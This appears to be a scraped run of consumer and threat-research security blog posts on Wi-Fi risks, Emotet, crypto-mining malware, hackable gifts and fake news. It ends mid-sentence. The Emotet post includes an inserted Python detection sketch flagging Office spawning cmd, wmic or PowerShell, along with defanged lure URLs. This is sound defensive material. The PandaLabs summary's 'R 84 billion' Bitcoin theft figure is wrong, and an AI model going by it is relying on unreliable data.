    Follow all our research and stories like these on Twitter at @McAfee_Labs.

    The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

    Kids, Travel and Wi-Fi

    If your brood of kids is anything like mine, holiday travel is all about devices and Wi-Fi. Sure, we’ll focus on sights and activities when we get to our destination, but the journey is made all the sweeter with a huge dose of technology!

    And as all my boys have pretty basic mobile phone plans (I’m paying!), a technology binge means Wi-Fi! Whether it’s connecting at the airport, on the plane – yes this is a thing now, in trains or in hotels – finding Wi-Fi is possibly more important to my boys than finding the next snack bar.

    But unfortunately, Wi-Fi is not the great nirvana. There can be some serious risks associated with connecting to random Wi-Fi outlets, as I continuously tell my offspring. The recent KRACK Wi-Fi saga, which potentially affected iOS and Android users worldwide, gave us all a big scare and reminded us yet again that modern Wi-Fi is not risk free.  Discovered by a Belgian researcher, the KRACK vulnerability meant a hacker could access your device even through a password protected Wi-Fi network. It was such a big deal that even the US Department of Homeland Security issued a warning!

    ‘It Won’t Happen To Me’

    Regardless of the warnings, there are still many amongst us that are not convinced Wi-Fi poses genuine risks, particularly when we travel. Many of my friends and family members still believe horror stories only happen to ‘other people’.

    And research conducted by McAfee confirms this very opinion, with the majority of Aussies surveyed not worried about the risks associated with Wi-Fi. In fact, 62% of people on holiday either don’t care or don’t bother ensuring they have a secure Wi-Fi connection. And 41% believe our personal information is as secure when we connect to public Wi-Fi on holiday as when we are at home or at work. Eeek!!!

    Why Do We Need To Worry?

    In short, accessing dodgy Wi-Fi means you are more likely to get hacked, which can cause you a world of pain! If you have connected to a Wi-Fi hotspot that has either been set up by a hacker or that a hacker has broken into, anything you send or share online you are also sharing with the hacker: banking details, online shopping logins, social media passwords… the list goes on. And once the hacker has that information, he/she can access your accounts as if they were you.

    In addition to potentially stealing your private information, hackers can also use public Wi-Fi to distribute malware, aka malicious software. Some hackers have been known to hack the Wi-Fi connection point itself to try and trick Wi-Fi users into downloading malicious software. Attractive, believable pop-ups appear on users’ screens offering a free upgrade to commonly used software. However, clicking the link in the pop-up ad downloads the malicious software!

    What Should We Do To Stay Safe?

    Well, let me tell you I’m not staying home… holidays keep me going! So, what we need to do is spend just a little time implementing a few strategies so we can securely manage our kids and their online lives when we travel. Not only will this minimise the risk but just as importantly, the stress!

    Here is how I’ll be managing my boys and their Wi-Fi connections when we set off on our annual family vacation this year:

    1. Ban Free Wi-Fi

    If your kids just have to connect to Wi-Fi, ensure it is a password-protected option, NOT a random free Wi-Fi. While this does not provide any guarantee of security, it is another layer of protection. However, no banking, financial or shopping transactions are to be undertaken on this Wi-Fi – no exceptions!

    2. Invest in a VPN

    A Virtual Private Network (VPN) is one of the best services you can sign up to. In simple terms, it creates a secure encrypted connection which means that anything you send or receive is safe. McAfee’s VPN, SafeConnect, provides bank-grade Wi-Fi encryption which means your personal data and online activities are kept private even when you are connected to public Wi-Fi.

    3. Update ALL Your Devices Before You Leave Home

    I know it is a pain but if the software and apps on your devices are not up to date, you’re essentially leaving a ‘back door’ open for a hacker. App creators and hardware vendors will release patches or updates when they become aware of a security vulnerability – so it is essential you have the latest and greatest installed before you walk out of your door!

    4. Turn Off Bluetooth When Not Using It

    This needs to become a family rule – just like turning off the lights before you leave the house! When your Bluetooth is active, hackers can see which networks you have connected to previously. It then takes very little effort for them to copy these networks and fool your device into connecting with their Bluetooth devices. Within minutes, the hacker can steal your data, download malware and create a world of pain!

    5. Download Security Software for All Your Devices including Smartphones!

    Ensuring your devices are protected with comprehensive security software is the same as locking the backdoor and turning on the house alarm – common sense. McAfee’s Total Protection software provides protection for your entire fleet of devices and includes anti-virus and anti-malware software, a firewall, anti-spam functions, parental controls and a password management tool.

    So, don’t cancel your holiday. Managing Wi-Fi safely when you travel with kids is absolutely possible with just a little planning. And if Nana and Pop are joining you on vacation, please ensure they are up to speed with the family Wi-Fi rules too! With 85% of older Australians accessing the internet every day, they will very likely have their eye on the Wi-Fi too!

    Happy Christmas and Safe Travels!

    Alex xx

    The post Kids, Travel and Wi-Fi appeared first on McAfee Blogs.

    Emotet Downloader Trojan Returns in Force

    During the past couple of days, we have seen an increase in activity from Emotet. This Trojan downloader spreads by emails that lure victims into downloading a Word document, which contains macros that after executing employ PowerShell to download a malicious payload.

    We have observed Emotet downloading a variety of payloads, including ransomware, Dridex, Trickbot, Pinkslipbot, and other banking Trojans.

    During a wave of attacks in early December we discovered a campaign spreading the ransomware family HydraCrypt. The sample we received had a compilation date of December 5.

    The initial Word documents were downloaded from a number of URLs; some examples follow:

    • hxxp://URL/DOC/Invoice/
    • hxxp://URL/scan/New-invoice-[Number]/
    • hxxp://URL/scan/New-invoice-[Number]/
    • hxxp://URL/LLC/New-invoice-[Number]/

    The document topics are crafted to entice users to open them because they appear to impact our finances or official documentation.

    • Invoice
    • Paypal
    • Rechnung (with or without a number)
    • Dokumente vom Notar

    The documents have typical characteristics used by Emotet attackers. When a user opens the document, it claims the file is protected and asks the victim to enable the content, which launches the code hidden in the macros.

    In analyzing the macros, we see heavily obfuscated code to make detection difficult and cover up the real purpose of the document:

    The macro code uses a mix of command, wmic, and PowerShell to copy itself to disk, create a service, and contact its control server for a download URL.

    Emotet collects information about the victim’s computer, for example running processes, and sends encrypted data to the control server using a POST request:

    The specific user-agent strings used in these requests:

    • Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
    • Mozilla/4.0(compatible;MSIE7.0;WindowsNT6.1;Trident/4.0;SLCC2;.NETCLR2.0.50727;
    • Mozilla/5.0(WindowsNT6.1;WOW64;rv:39.0)Gecko/20100101Firefox/38.0
    • Mozilla/5.0

    The payload samples are downloaded to %Windir%\System32 using a random name, either in GUID format or a five-digit random name.
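    As an added illustration, not McAfee's code or detection content, the following Python sketch turns the two behaviours described above into simple rules: an Office application launching cmd, wmic or PowerShell, and a GUID- or five-digit-named executable appearing directly under %Windir%\System32. The process-creation log format and the sample lines are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Office applications that have no business launching a command interpreter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# The interpreters the page says the macro chains together.
INTERPRETERS = {"cmd.exe", "wmic.exe", "powershell.exe"}

# Payload naming described on the page: GUID-style or five random digits.
GUID_EXE = re.compile(
    r"^\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?\.exe$", re.I)
DIGITS_EXE = re.compile(r"^\d{5}\.exe$")
SYSTEM32 = "c:\\windows\\system32\\"


@dataclass
class ProcEvent:
    parent: str   # parent image name, lower-cased
    image: str    # child image name, lower-cased
    cmdline: str  # command line (arguments omitted in the constructed sample)
    target: str   # file path the process created, or "" if none


def parse_line(line: str) -> Optional[ProcEvent]:
    """Parse one 'key=value|key=value' line of the constructed (hypothetical) log format."""
    fields = {}
    for part in line.strip().split("|"):
        if "=" not in part:
            return None
        key, value = part.split("=", 1)
        fields[key.strip().lower()] = value.strip()
    if "parent" not in fields or "image" not in fields:
        return None
    return ProcEvent(
        parent=fields["parent"].lower(),
        image=fields["image"].lower(),
        cmdline=fields.get("cmdline", ""),
        target=fields.get("target", ""),
    )


def office_spawns_interpreter(ev: ProcEvent) -> bool:
    """Word/Excel/PowerPoint starting cmd, wmic or PowerShell: the macro's first step."""
    return ev.parent in OFFICE_PARENTS and ev.image in INTERPRETERS


def wmic_spawns_interpreter(ev: ProcEvent) -> bool:
    """wmic launching another interpreter, the middle link of the chain the page describes."""
    return ev.parent == "wmic.exe" and ev.image in INTERPRETERS


def suspicious_system32_payload(path: str) -> bool:
    """True for a GUID- or five-digit-named .exe placed directly in %Windir%\\System32."""
    p = path.lower().replace("/", "\\").replace("%windir%", "c:\\windows")
    if not p.startswith(SYSTEM32):
        return False
    name = p[len(SYSTEM32):]
    if "\\" in name:          # subdirectories such as System32\drivers are out of scope
        return False
    return bool(GUID_EXE.match(name) or DIGITS_EXE.match(name))


def analyze(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, reason) for every line that matches one of the rules."""
    findings: List[Tuple[int, str]] = []
    for number, line in enumerate(lines, 1):
        ev = parse_line(line)
        if ev is None:
            continue
        if office_spawns_interpreter(ev):
            findings.append((number, f"{ev.parent} spawned {ev.image}"))
        if wmic_spawns_interpreter(ev):
            findings.append((number, f"wmic.exe spawned {ev.image}"))
        if ev.target and suspicious_system32_payload(ev.target):
            findings.append((number, f"randomly named executable in System32: {ev.target}"))
    return findings


# Constructed sample log: six process-creation events, an Emotet-like chain among them.
SAMPLE_LOG = [
    "parent=explorer.exe|image=WINWORD.EXE|cmdline=WINWORD.EXE New-invoice.doc",
    "parent=WINWORD.EXE|image=cmd.exe|cmdline=cmd.exe [arguments omitted]",
    "parent=cmd.exe|image=wmic.exe|cmdline=wmic.exe [arguments omitted]",
    "parent=wmic.exe|image=powershell.exe|cmdline=powershell.exe [arguments omitted]"
    "|target=C:\\Windows\\System32\\{3f2504e0-4f89-11d3-9a0c-0305e82c3301}.exe",
    "parent=services.exe|image=svchost.exe|cmdline=svchost.exe -k netsvcs",
    "parent=explorer.exe|image=notepad.exe|cmdline=notepad.exe|target=C:\\Users\\alice\\12345.txt",
]

if __name__ == "__main__":
    for number, reason in analyze(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

    The rules deliberately ignore the command-line arguments, so a sandbox or EDR feed that records parent/child and file-creation events is enough to apply them.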

    The control servers and URLs hosting the malicious documents are covered within McAfee Global Threat Intelligence, which provides coverage for the samples detected. The McAfee Advanced Threat Research team proactively monitors any new developments regarding Emotet.


    The new variants of Emotet are detected by McAfee DAT files as Emotet-FEJ!<Partial Hash> since December 3. Real Protection technology within McAfee Endpoint Security Adaptive Threat Protection provides zero-day detection of these new variants as Real Protect-SS!<Partial Hash>.

    The post Emotet Downloader Trojan Returns in Force appeared first on McAfee Blogs.

    Malware Mines, Steals Cryptocurrencies From Victims

    How’s your Bitcoin balance? Interested in earning more? The value of cybercurrency is going up. One way to increase your holdings is by “mining,” which is legal as long as it is done with the proper permissions. Using your own mining equipment or establishing a formal agreement for outsourcing are two methods. Hardware vendors such as Asus manufacture motherboards that are specifically tailored for mining cryptocurrency.

    Bitcoin mining involves complex mathematical calculations that are carried out by a computer’s hardware and result in transaction records. These records are added to the Bitcoin public ledger, the “blockchain.” The ledger keeps track of all transactions and verifies these transactions are legitimate.

    Cybercriminals are also attracted to online currency, which fuels much of their business, including malware purchases and ransomware payments. Cybercriminals would rather find outside computing power instead of using their own equipment because the price of a dedicated mining machine could exceed US$5,000. Cybercriminals often seek to bypass the agreement phase and maliciously introduce malware that will either use a victim’s computing power to mine for coins or simply locate and steal the user’s cryptocurrency.

    Three popular Bitcoin miners.


    The number of instances of mining malware has increased significantly, to 1.65 million victims this year, according to one report. That’s a lot of slowing machines and increased electricity costs. For individual users, the slowness and increased electricity bill may be trivial, and go unnoticed for a time. For businesses with hundreds or thousands of machines, however, the cost increase can be substantial.

    The increased interest in illegally mining or stealing cryptocurrencies correlates easily with the increased value of these currencies. One Bitcoin (BTC) was recently worth more than $7,500, up from around $3,000 a few weeks ago. Even considering an earlier decline in value, Bitcoin has been trending upward for years. This upswing in value and the recent adoption of Bitcoin in Japan and South Korea as a legal tender have increased the demand for acquiring Bitcoin and altcoins. In September cybercriminals stole $63,000 worth of cryptocurrency in about three months by taking advantage of a flaw in Microsoft Windows Internet Information Services.

    The price of Bitcoin since 2010. Source: CoinDesk.

    Initial coin offerings (ICOs) have also contributed to this gold rush. ICOs are similar to IPOs but instead of issuing to investors shares of a new company, the investors are given cryptocurrency in the hopes a new company will be successful and result in a higher value for their digital coins.

    During the last few years we have seen an increase in innovation by malware authors to infiltrate this space, resulting in malware that mines or steals coins and spans various platforms. Let’s break down some of the tools and techniques in the world of crypto-mining/-stealing malware that have arisen.

    • NightMiner
    • Adylkuzz
    • EternalMiner
    • MulDrop.14
    • ELF Linux/Mirai
    • OSX/Miner-D
    • Dridex
    • Trickbot
    • Jimmy Nukebot
    • HawkEye
    • Cerber
    • Web Mining


    NightMiner mining malware was first seen in the wild in March 2015 and has been used to mine the Monero cryptocurrency. Some cybercriminals have turned to Monero due to its built-in security features and lower cost to mine. For example, Monero by default supports many blockchain obfuscation and anonymity technologies such as stealth addresses and crypto notes. This malicious software has been discovered on network attached storage (NAS) devices and takes advantage of those devices’ powerful CPU and GPU resources. The mining software can stay under the radar on these devices because most administrators fail to install antimalware software on NAS systems. Sophos released an extensive report discussing this malware.


    Adylkuzz is more recent, coming on the scene this year. The mining malware is similar to the well-known ransomware WannaCry in that it exploits two flaws in Microsoft’s server message block (SMB) that are known as EternalBlue and DoublePulsar. Both defects were leaked by the Shadow Brokers hacking group and are believed to be the work of the U.S. National Security Agency’s Equation Group. Adylkuzz is unique in that it blocks all access to TCP port 445, preventing other malware from taking advantage of the SMB flaws.

    Code snippet from the EternalBlue Metasploit module.


    Linux systems are not immune. EternalMiner took advantage of a vulnerability in Samba to infect as many systems as possible. The flaw allowed Samba servers to load and execute code remotely after a shared library was uploaded by a malicious client. A patch to address the seven-year-old flaw was released in May, but cybercriminals made thousands of dollars before network administrators could update their servers.


    Researchers have seen instances of Raspberry Pi—a small, versatile single-board computer— attacked by the crypto mining malware Linux.MulDrop.14. The malicious software does not attempt to mine the CPU-intensive Bitcoin but, like NightMiner, focuses on Monero. This action shows a level of innovation as cybercriminals expand their scope to acquire cryptocurrencies across additional platforms.

    ELF Linux/Mirai

    Cryptocurrency malware mining has been discovered in connection with the Mirai botnet. ELF Linux/Mirai continues to evolve and has added a Bitcoin miner slave module, allowing the malware to mine cryptocurrency from thousands of infected IoT devices, according to a report from IBM X-Force. Mirai, discovered in August 2016, infected IoT devices and has also been responsible for several DDoS attacks, including against DNS provider Dyn and Liberia’s Internet infrastructure.


    Source: McAfee Labs Threats Report, March 2017


    Although Apple’s Mac OS has not been heavily targeted, it is also not immune. OSX/Miner-D both steals Bitcoins and mines a system. This malware has been around since 2011 and is the second most common malware on the Mac. The malware, which is inserted into legitimate apps uploaded to torrent sites, made a surge early this year and resulted in more than 20% of all detections in May. We expect to soon see new variants of this malicious software.


    Cryptocurrency mining has caught the attention of the Dridex Trojan’s developers. Dridex is a banking Trojan that steals credentials to access accounts. Samples of this malware were discovered in 2016 that find and steal cryptocurrency wallets.

    Dridex is sophisticated malware. The developers behind this malware continue to evolve its code to avoid detection, increase infections, distribute ransomware, steal banking and personal information, and now pilfer Bitcoins.


    The cybercriminals behind Trickbot have added the capability to steal cryptocurrency. Trickbot has been around for years and has recently added as one of its attack vectors. Once a system is infected, the malware monitors the victim’s browsing habits and injects a fake login page whenever the user visits The fake page allows criminals to steal the login information, resulting in the theft of cryptocurrencies including Bitcoin, Ethereum, and Litecoin as well as other digital assets.

    Jimmy Nukebot

    Another Trojan making headlines is Jimmy Nukebot. The authors behind the malicious software used code from the NeutrinoPOS banker Trojan. This variant, detected by McAfee as RDN/PWS-Banker, does not steal bank card data as before but installs various modules that contain a payload. One payload mines Monero. The digital wallet associated with the miner has received only about $45, which may indicate the malware authors either changed wallets or have stopped mining, according to Kaspersky.

    McAfee Labs detections for some variants of mining malware. Peak detections are the highest number of detection occurrences on a single date in 2017.


    The credential harvesting malware HawkEye, which surfaced in 2014, has added Bitcoin wallet stealing to its arsenal. The malware is well known for stealing a variety of credentials from web browsers and mail clients. Recent samples show HawkEye targeting the file wallet.dat, which holds the user’s Bitcoin private keys along with other transaction information.


    Developers behind most ransomware prefer the ransoms be paid using cryptocurrency. In the recent case of Cerber, however, the actors have resorted to stealing the coins from the wallet before encrypting the system. Cerber is one of the most prolific ransomware families, infecting millions of computers worldwide. The ransomware has seen a decline in the past few months but continues to wreak havoc.

    The number of Cerber samples detected during the last 90 days. Source: Ransomware Tracker.

    Web Mining

    One new trend is a technique that mines cryptocurrency when visitors connect to websites. Coinhive and Crypto-Loot, as well as others, sell Monero mining software that allows the buyer to insert JavaScript into websites. The JavaScript mines cryptocurrency by using the site visitor’s CPU power. The service has been a hot topic since it first appeared because the software can be used maliciously to allow cybercriminals to mine cryptocurrency without users’ consent. A few legitimate sites, including The Pirate Bay and a major television company, have recently been found using the software to mine Monero. The entertainment conglomerate has removed the code, but it remains unclear whether hackers injected the software or whether the company included the code to make a few extra dollars while unsuspecting users were watching their favorite shows.

    The Pirate Bay has also removed the mining code and released a statement claiming the 24-hour test was designed to see if the popular file-sharing site could use the miner to generate revenue and potentially replace ads. A few other sites, including Iridium and PublicHD, are using the JavaScript code openly: Both sites inform their users of the code and in the case of Iridium allow them to opt out. The unsuspected use of web miners has caused some websites to go dark. Internet provider Cloudflare began shutting down domains after the company discovered Coinhive’s software mining Monero from visitors to torrent site ProxyBunker. The domains, which were shuttered for not allowing users to opt out, were reopened after removing the mining code.

    JavaScript code from Iridium’s Google Chrome miner extension.

    Crypto mining is not new, but it has gained attention due to the popularity of cryptocurrency, ICOs, and the overall value increase of altcoins. As the adoption rate for cryptocurrency grows, we can expect cybercriminals to increasingly mine or steal cryptocurrency illegally. They can use the stolen funds to shop on the dark web or exchange them for real currency.

    A timeline of leading cryptocurrency miners.

    The post Malware Mines, Steals Cryptocurrencies From Victims appeared first on McAfee Blogs.

    Don’t Let the Grinch Hack Your Christmas!

    What’s on your family’s Christmas list this year? Let me guess – technology! Our desire for shiny, fast, connected devices is almost a biological condition this time of year. However, our single-minded desire to get these devices in our hands at all costs, often means we forget about the risks…

    To try and understand how us Aussies are planning on managing the risks associated with this season’s must-have Christmas gifts, McAfee Australia interviewed over 1000 Aussies aged 18-55. Participants were asked whether they were planning on buying internet-connected gifts this Christmas, how they plan to buy them and what they know about how to secure their new devices. And the findings were very interesting…

    • Online shopping is Booming But We Are Taking Risks!

    76% of us are likely to purchase gifts online this coming holiday season – an increase of 2% from last year. And while most of us will purchase from online stores of well-known retailers, some of us (18%) will choose stores that we find randomly through online shopping searches.

    • There Is Still Confusion About Protecting Our Devices

    90% of us feel it is important that our online identity and connected devices are safe and secure but alarmingly, only 14% of us feel that it is necessary to protect devices with security software – down from 15% in 2016.

    • Our Devices are Collecting Our Information But Most of Us Are OK with It

    Many consumers (76%) believe their devices are collecting their personal information

    • Some of Us ‘Need’ The Latest Devices At All Costs

    Despite acknowledging that our chosen device may be susceptible to security breaches, 22% of us still commit to buying it!

    There is no doubt we value our digital assets with 61% of us believing their digital assets (our online files and media) are worth more than $1000 and 34% worth more than a whopping $5000!!

    So, What Does This All Mean?

    There is no doubt that we love our technology! In fact, in recent research from Telefonica, we are ranked 3rd worldwide when it comes to embracing technology. We even beat the Japanese!

    However, the way we shop online, protect (or not) our devices and share our information plays a major role in how easy (or not) it is for cybercriminals to hack us, putting our much-loved digital assets at risk. And add a dose of Christmas cheer (and chaos) into the mix – and you can see how the risk increases!

    Which Are The Most Hackable Devices?

    To minimise the chance of the Grinch (aka cybercrims) ruining our Christmas this year, McAfee Australia has compiled a list of the devices most Australians have nominated as top of their Christmas lists. Each device’s security vulnerabilities have then been highlighted so you can take the required steps to ensure you are not hacked!! Here’s the lowdown:

    1. Laptops, Smartphones and Tablets

    According to our McAfee experts, laptops, smartphones and tablets take out first place for being the ‘Most Hackable’ gifts for Christmas 2017! As soon as those Christmas decorations come out, so do the sexiest models about. Slim, powerful yet light PCs, laptops and smartphones packed with the latest features and apps fill the stores… and we go into a frenzy!

    Risks: Malware, especially ransomware, continues to dominate the headlines and has grown to more than 10 million samples worldwide. Just like laptops and PCs, tablets and smartphones are vulnerable to ransomware and can be compromised.

    Tips: Slow down and think before clicking. One of the easiest ways for cybercriminals to infect your PC or smartphone is through malicious links. Be sceptical if you receive a link you are not expecting, use comprehensive security software that is kept updated, and install parental controls on all your children’s devices.

    2. Drones

    Drones won second place this year in the ‘Most Hackable’ stakes and it seems we can’t get enough of them. US drone sales are expected to top US$1 billion (A$1.3 billion) in 2017, up from US$799 million (A$1.04 billion) in 2016. And what a terrific gift – perfect for the amateur flight enthusiast through to the professional photographer looking to get that unique angle from up high!

    Risks: Drones can be vulnerable in multiple ways. While it’s true they can be hacked in flight, they can also emit a Wi-Fi signal designed to steal your personal information after connecting.

    Tips: Always keep the software updated on your drone, and apply software patches when they are made available from the manufacturer.  Be careful about connecting to unsecured Wi-Fi networks. If you must connect, do so with a Virtual Private Network (VPN) like McAfee Safe Connect.

    3. Digital Assistants

    The must-have tech gadget of 2017, the Digital Assistant comes in at 3rd place on the ‘Most Hackable’ honours list. Digital Assistants are without doubt the perfect gift for anyone. However, like any connected device, digital assistants can also be the target of cybercriminals. As new technology comes to market, the cybercriminals are always trying to stay a step ahead – Digital Assistants are no exception!

    Risks: Built-in microphones that are always listening for a wake-up command and, in some cases, cameras, can be compromised and turned into listening devices.

    Tips: Just like your smartphone or PC, be sure to keep your device’s software up-to-date, and never allow physical access to anyone you do not trust.

    4. Connected Toys

    Coming in at 4th place, Connected Toys seem to be featured on every mini digital native’s Christmas list this year. Many of the must-have connected toys come equipped with GPS chips, cameras and an interactive conversation ability making them super attractive!

    Risks: Be aware of the privacy and security risks that could affect connected toys. Manufacturers may not be putting the device’s security as a top priority which could leave it vulnerable to leaking personal information, location, or even allow a hacker to hijack the camera or microphone.

    Tips: Research before you buy to make sure the toy you plan to purchase has not had any reported security issues. If the toy comes with a default password, ensure you change it to something more secure. Finally, monitor children when they are playing with connected devices and turn the toy off when it’s not in use to ensure that their privacy is being protected.

    5. Connected Appliances

    Vacuums, refrigerators, bathroom scales and cameras that connect to the internet aka ‘connected appliances’ are also on hackers’ lists this year. I’m very partial to some of these devices – they just make modern life so much easier!

    Risks: While an attack on your refrigerator is unlikely, it’s not unheard of for connected home appliances to be hijacked and used as a pawn in a distributed denial of service attack (DDoS). A connected appliance could also leak personal information or provide details about your home, like its size and dimensions, making you a bigger target for cybercriminals.

    Tips: Do not allow your connectable devices to connect to the internet without any filtering. Always change your connected devices’ default manufacturer passwords to something strong and complex. Read the privacy policies provided by manufacturers so you know exactly what information your device is collecting.

    Before you start wrapping up your shiny tech Christmas gifts, please make sure you have a plan in place to protect the device from a Christmas hack. Why not share a few of the above tips with the lucky recipients in their Christmas card? Or better still, why not spend a little time on Christmas Day working through it together. A great Christmas bonding exercise!

    Happy Christmas!

    Alex x

    The post Don’t Let the Grinch Hack Your Christmas! appeared first on McAfee Blogs.


    The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequences got out of hand when illiterate tribals in a remote Indian district received a WhatsApp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of up to 500 people pounced on strangers whom they suspected to be the child kidnappers; in all, there were two incidents in which 7 people were lynched.
    It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

     As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

    Creation of fake news is extremely simple. Listed below are six commonly used methods:

    ·         Individuals concoct their own stories

    ·         Marketers release competitive advertisements based on unproven data

    ·         Groups with vested interests manipulate the volume and narrative of news.

    ·         Photographs are morphed

    ·         Old photographs are used to depict recent events

    ·         Real photographs are used to defame

    It is also quite easy to catch the perpetrator. A few years back a Twitter hoax might have been dealt with by a strong reprimand, but not today: fake news, hoaxes, rumours or any other content that results in incitement or defamation now attracts stronger penalties and jail terms, and police are more aware and vigilant.
    Most cybercitizens unwittingly help fake news go viral by recirculating it. Each forward creates a sense that the news must be true, because the previous sender must surely have validated it before passing it on.

    Pause before forwarding, evaluate the veracity, and only then forward. Do not be the link in the chain responsible for the circulation of fake news.
    Cybercitizens, take care when crafting messages on social media: a little mischief may earn you a few years in government-paid accommodation, i.e. jail. Advise your children to be responsible and to cross-check news received over social media before recirculating or believing it.

    Twelve Commandments that will never fail to Keep You Cyber Safe Online

    As the digital world explodes with a variety of new online services, cyber threats have become more ingenious and dangerous, and have spawned multiple variants and types. As each new threat makes the headlines, the accompanying set of threat-specific security recommendations confuses cybercitizens. Cybercitizens want a comprehensive list of recommendations that does not change frequently.

    There are twelve foundational security practices that will help keep you and your family safe. Practicing them will harden your defenses against cybercrime and also reduce the negative effects of social media use.

    1)    Thou shalt not use a device with pirated software
    Pirated software is not patched because it is unlicensed. Unpatched software has security vulnerabilities that can easily be exploited to steal data and credentials.

    2)    Thou shalt not use a device that is not set for automatic updates of operating system patches
    Automatic patching of personal devices is the best way to ensure that the latest security patches are applied and security loopholes closed before cybercriminals can get to them.

    3)    Thou shalt not use a device without updated antimalware (antivirus) software installed
    Antimalware software reduces the probability of a malware infection (e.g. ransomware) on your device. To be effective against the latest malware variants, it has to receive its updates automatically.

    4)    Thou shalt not download pirated movies, games and other such material
    Something free may turn out to be expensive, both financially and to your reputation. Malware is routinely bundled with pirated content and applications.

    5)    Thou shalt not use a site without trying to verify its authenticity
    The authenticity of a site can be checked through the lock icon and the accompanying digital certificate. This is not foolproof: the certificate only proves that you are talking to the domain shown in the address bar, so look carefully at that domain name. It does, however, reduce the chance of falling for spoofed lookalike sites designed to steal your credentials.

    6)    Thou shalt not ignore inappropriate content on social networks; always report or dislike it
    Inappropriate content influences the minds of our children as they stumble upon it online. Hate content in particular may induce biases that take a long time to reverse.

    7)    Thou shalt not indulge in or encourage cyber bullying online
    A parent or teacher has the additional responsibility of guiding children on the right online behavior. You do not want your children to bully or be bullied.

    8)    Thou shalt not use passwords that can be easily guessed, and thou shalt keep thy passwords secret
    Choose complex passwords, do not reuse them on multiple sites and always store them securely. The easiest way into your online accounts is by stealing your passwords.

    9)    Thou shalt not be tempted by fraudulent emails promising financial windfalls, miracle cures or cheap medicines
    Try to check the authenticity of the email. Electronic communication is easily manipulated, because the authenticity of the sender is hard to verify. Scams like these can cost you money and affect your health.

    10) Thou shalt not forsake your responsibility of helping your older parents or young kids to be safe as they use the internet
    Be a guide, and be easily available, as both old and young learn to use the internet and face cyber risks. Being available means that you can be reached for instant advice on problems they encounter.

    11) Thou shalt never trust a stranger blindly online
    Always be suspicious when dealing with online strangers, and never let down your guard at any point in the relationship. The identity of an online person cannot easily be verified, but it can easily be faked. Online "friends" sometimes have the vilest of intentions, which can lead to all forms of blackmail, particularly if they obtain compromising pictures or videos. Besides adults, young children are potential victims.

    12) Thou shalt not set a weak password for your mobile phone or leave it unlocked
    A stolen phone that is unlocked, or protected only by an easy-to-guess passcode, is an open invitation into all your signed-in accounts and personal data. A large number of phones are left unattended or lost each year.

    Cybercrime Surges in Q3


    The PandaLabs Q3 Report indicates that cybercrime continues to increase, with 18 million new malware samples captured this quarter, more than 200,000 samples a day.

    The Quarter at a Glance

    Cybercrime continues to grow at an exponential rate, fuelled by the opportunity for large financial rewards.

    Hackers have taken to developing new variants of successful ransomware such as Locky, and to a model known as Ransomware-as-a-Service (RaaS), in which developers write the ransomware and hand it to distributors, who then target and infect victims, allowing both parties to achieve greater profits.

    Another key development was the scale of DDoS attacks, most notably the one against security journalist Brian Krebs. Krebs' exposure of the vDoS booter service led to the arrest of its key members and subsequently made his site the target of a massive DDoS attack, which ended only when Google's Project Shield stepped in to host it. One of the largest attacks of its kind, it leveraged compromised IoT devices to send 620 Gbps of traffic at its peak.
    This quarter cyber-attacks also targeted multiple gaming sites, gaining access to millions of users' personal information. These attacks were largely launched using botnets composed of smartphones, and affected users of Overwatch, World of Warcraft and Diablo 3. Further attacks exposed more than 3.5 million users when Dota 2 and the mobile game Clash of Kings were targeted. These are just a few of the incidents in the gaming world in the last three months.

    The banking sector remained a target as attacks on ATMs, POS terminals and Bitcoin wallets continue to become more frequent and more advanced.

    A Taiwanese ATM attack this quarter showed just how advanced cybercriminals have become: they compromised the bank's internal network and had the machines pay out over R28 million without the attackers touching the ATMs themselves.

    Another big victim was Yahoo. In one of the biggest breaches of its kind, the company revealed this quarter that 500 million user accounts had been compromised in a 2014 attack.

    Finally, Q3 saw the largest Bitcoin robbery to date, when R 84 billion worth of Bitcoin was stolen by hackers.

    View the full PandaLabs Q3 Report for more detail on specific attacks and find out how you can protect yourself and your business from the advanc


    Ten Years of Cybercrime & Doing Time

    On October 10, 2006 while I was sitting in my office at Energen I decided to start a blog.  I had been an InfraGard member for five years at that time, and was realizing based on the feedback I was getting from other InfraGard members around the country that while many people knew about Cyber Security, very few knew about CyberCrime.  I was working on a daily basis with the FBI Cybercrime Squad in Birmingham, so I had a fairly good view on the topic, so I decided to try to share what I knew by starting this blog.  One year later I had taken things to a whole new level by quitting my job at the Oil & Gas company and moving to the University of Alabama at Birmingham to dedicate the next decade to training new cybercrime fighters!

    While the blog has seen ups and downs in the regularity of the posts, even being named "Most Popular Security Blog" by SC Magazine back in 2010, overall we've averaged one post per week and have been visited by nearly 3 million readers.

    As I tried to decide how to mark the 10th Anniversary of the blog, I thought one way to do it would be to share what has been our most popular stories each year.

    One of the strengths of the blog has always been to document "big campaigns" that are attacking people and try to help them understand the nature of the scam so that they could avoid being a victim themselves.  The three most popular stories on the blog have all been of that nature:

    1. "More ACH Spam from NACHA" (March 11, 2011) and "ACH Transaction Rejected payments lead to Zeus" (Feb 25, 2011) were both of that type.  Even years later, spikes in visitors to these stories were an indication that someone was imitating NACHA again.   In these spam campaigns, the spammers would claim to be sending email from the  "National Automated Clearing House Association" the organization that handles all electronic payments between American banks.  We later came to call these type of campaigns "Soft-Targeting" as most Americans have never heard of NACHA, but those who are involved in regularly moving money most certainly would have -- making them also the most likely to fall victim to such a spam message.  The first entry in this series, "Newest Zeus = NACHA: The Electronic Payments Association" (November 12, 2009) was also very popular.

